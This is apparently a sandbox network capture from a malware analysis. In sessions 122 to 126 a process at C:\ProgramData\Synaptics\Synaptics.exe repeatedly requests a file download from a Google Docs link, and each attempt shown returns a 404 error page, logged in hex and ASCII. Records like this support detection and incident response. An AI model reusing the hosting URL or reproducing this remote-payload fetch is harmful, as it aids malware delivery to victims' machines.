                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:46 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-IjtjrUxbKgdq71+m7MldRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:46 UTC372INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:46 UTC372INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 4f 54 34 52 53 38 77 6e 61 63 6c 61 4c 59 53 4d 70 43 32 75 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nOT4RS8wnaclaLYSMpC2uA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:46 UTC374INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:46 UTC374INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        122192.168.2.349881142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:45 UTC371OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:46 UTC374INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:46 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-L5LxLLlRZ/8+mY235anmxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:46 UTC375INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:46 UTC375INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 52 6c 79 46 30 69 55 38 74 59 35 54 48 38 37 59 55 48 6d 76 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CRlyF0iU8tY5TH87YUHmvQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:46 UTC376INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:46 UTC377INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        123192.168.2.349882142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:46 UTC377OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:46 UTC377INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:46 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-dixZd3oVcUqJ5ZowI5ZHug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:46 UTC379INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 63 49 41 59 5a 33 52 42 5a 39 41 71 30 6f 64 56 41 79 72 61 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OcIAYZ3RBZ9Aq0odVAyraQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:46 UTC380INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:46 UTC380INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        124192.168.2.349883142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:46 UTC377OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:46 UTC380INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:46 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-gIqzoOEthBk6NzsRjfkojQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:46 UTC382INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:46 UTC382INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 77 68 75 43 6e 61 51 4a 57 52 61 67 37 65 4c 4d 59 34 51 36 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QwhuCnaQJWRag7eLMY4Q6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:46 UTC383INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:46 UTC383INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        125192.168.2.349885142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:46 UTC380OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:47 UTC383INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:46 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-nQQ82it87ymUmMUlCrhQ/Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:47 UTC385INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:47 UTC385INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 61 39 4e 54 55 7a 4f 37 54 34 4b 79 2b 76 6b 65 6a 41 54 7a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qa9NTUzO7T4Ky+vkejATzg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:47 UTC386INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:47 UTC386INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        126192.168.2.349886142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:46 UTC383OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:47 UTC386INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:47 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
